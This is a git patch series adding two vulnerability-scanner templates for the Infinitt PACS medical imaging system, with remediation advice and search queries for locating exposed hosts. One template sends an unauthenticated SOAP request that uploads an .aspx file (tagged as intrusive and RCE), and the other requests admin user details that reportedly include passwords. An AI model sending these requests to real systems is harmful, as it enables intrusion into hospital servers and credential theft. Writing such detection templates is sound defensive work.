From e6f8c28db2632359fcd4757db57e922ffb05b6bd Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Mon, 9 Dec 2024 00:00:26 +0800
Subject: [PATCH 1/5] infinitt pacs system vuln
add infinitt-pacs-information-leak.yaml and infinitt-pacs-file-upload-vuln.yaml
---
.../infinitt-pacs-file-upload-vuln.yaml | 50 +++++++++++++++++++
.../infinitt-pacs-information-leak.yaml | 35 +++++++++++++
2 files changed, 85 insertions(+)
create mode 100644 http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
create mode 100644 http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
new file mode 100644
index 00000000000..336f525103e
--- /dev/null
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
@@ -0,0 +1,50 @@
+id: infinitt-pacs-file-upload-vuln
+
+info:
+ name: Infinitt PACS System File Upload Vulnerability
+ author: adeljck
+ severity: critical
+ description: |
+ Infinitt PACS System is vulnerable to file upload vulnerability which allows an attacker to upload a webshell and gain unauthorized access to the server.
+ remediation: |
+ Ensure that file uploads are properly validated and sanitized. Implement strict access controls and monitoring to detect and prevent unauthorized file uploads.
+
+variables:
+ filename: "{{randstr}}"
+
+http:
+ - raw:
+ - |
+ POST /webservices/WebJobUpload.asmx HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ Content-Length: 397
+ Accept-Encoding: gzip, deflate
+ Content-Type: text/xml; charset=utf-8
+ Soapaction: "http://rainier/jobUpload"
+ Connection: close
+
+
+
+
+
+ 1
+
+ {{filename}}.aspx
+ MTIz
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - ""
+ - type: word
+ part: header
+ words:
+ - "text/xml"
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
new file mode 100644
index 00000000000..4e850ab1650
--- /dev/null
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
@@ -0,0 +1,35 @@
+id: infinitt-pacs-information-leak
+
+info:
+ name: Infinitt PACS System Information Leak
+ author: adeljck
+ severity: high
+ description: |
+ Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+ remediation: |
+ Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
+
+http:
+ - raw:
+ - |
+ GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "web_user_login"
+ part: body
+ - type: word
+ words:
+ - "text/xml"
+ part: header
From 365aa0243805683eae20229350f1f0608657b8c7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 13 Dec 2024 14:36:16 +0530
Subject: [PATCH 2/5] Update and rename infinitt-pacs-file-upload-vuln.yaml to
infinitt-pacs-file-upload.yaml
---
...ln.yaml => infinitt-pacs-file-upload.yaml} | 28 +++++++++++--------
1 file changed, 17 insertions(+), 11 deletions(-)
rename http/vulnerabilities/infinitt/{infinitt-pacs-file-upload-vuln.yaml => infinitt-pacs-file-upload.yaml} (64%)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
similarity index 64%
rename from http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
rename to http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
index 336f525103e..ed28987e804 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
@@ -1,28 +1,31 @@
-id: infinitt-pacs-file-upload-vuln
+id: infinitt-pacs-file-upload
info:
- name: Infinitt PACS System File Upload Vulnerability
+ name: Infinitt PACS System - Arbitary File Upload
author: adeljck
severity: critical
description: |
Infinitt PACS System is vulnerable to file upload vulnerability which allows an attacker to upload a webshell and gain unauthorized access to the server.
remediation: |
Ensure that file uploads are properly validated and sanitized. Implement strict access controls and monitoring to detect and prevent unauthorized file uploads.
+ reference:
+ - https://github.com/wy876/POC/blob/a9e4000fc76d0157b53ade916323b7b8256b17c3/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9F/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9FWebJobUpload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+ tags: infinitt,file-upload,intrusive,rce
variables:
- filename: "{{randstr}}"
+ filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- Content-Length: 397
- Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
- Connection: close
@@ -35,16 +38,19 @@ http:
+
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- type: word
part: body
words:
- ""
+
- type: word
- part: header
+ part: content_type
words:
- "text/xml"
+
+ - type: status
+ status:
+ - 200
From 7667e5a732b86dd6353d2d18c17304c584be9ca0 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 13 Dec 2024 14:57:09 +0530
Subject: [PATCH 3/5] Update and rename infinitt-pacs-information-leak.yaml to
infinitt-pacs-info-leak.yaml
---
...leak.yaml => infinitt-pacs-info-leak.yaml} | 28 +++++++++++--------
1 file changed, 16 insertions(+), 12 deletions(-)
rename http/vulnerabilities/infinitt/{infinitt-pacs-information-leak.yaml => infinitt-pacs-info-leak.yaml} (70%)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
similarity index 70%
rename from http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
rename to http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
index 4e850ab1650..e1fa139cb12 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -1,35 +1,39 @@
-id: infinitt-pacs-information-leak
+id: infinitt-pacs-info-leak
info:
- name: Infinitt PACS System Information Leak
+ name: Infinitt PACS System - Information Leak
author: adeljck
severity: high
description: |
Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
remediation: |
Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+ tags: infinitt,info-leak
http:
- raw:
- |
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
Host: {{Hostname}}
- Accept-Encoding: gzip, deflate
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
- Connection: close
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- type: word
+ part: body
words:
- "web_user_login"
- part: body
+ - "USER_KEY"
+ condition: and
+
- type: word
+ part: content_type
words:
- "text/xml"
- part: header
+
+ - type: status
+ status:
+ - 200
From 3aa26de7b759187e3bf8494760a1228bcc1a9934 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 13 Dec 2024 14:57:23 +0530
Subject: [PATCH 4/5] fix-trail-sapce
---
http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
index ed28987e804..97a980dd5cd 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
@@ -1,7 +1,7 @@
id: infinitt-pacs-file-upload
info:
- name: Infinitt PACS System - Arbitary File Upload
+ name: Infinitt PACS System - Arbitary File Upload
author: adeljck
severity: critical
description: |
From 4713b7def5a4a0f48d2a4fc5e773fa343166b346 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 23 Dec 2024 10:43:34 +0530
Subject: [PATCH 5/5] Update infinitt-pacs-info-leak.yaml
---
.../infinitt/infinitt-pacs-info-leak.yaml | 19 +++++++++----------
1 file changed, 9 insertions(+), 10 deletions(-)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
index e1fa139cb12..f94d699233a 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -1,32 +1,31 @@
-id: infinitt-pacs-info-leak
+id: infinitt-pacs-info-disclosure
info:
- name: Infinitt PACS System - Information Leak
+ name: Infinitt PACS System - Information Disclosure
author: adeljck
severity: high
description: |
- Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+ Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
remediation: |
Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="1474455751" || icon_hash="702238928"
- tags: infinitt,info-leak
+ tags: infinitt,disclosure,exposure
http:
- - raw:
- - |
- GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
- Host: {{Hostname}}
+ - method: GET
+ path:
+ - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "web_user_login"
- - "USER_KEY"
+ - ""
+ - ""
condition: and
- type: word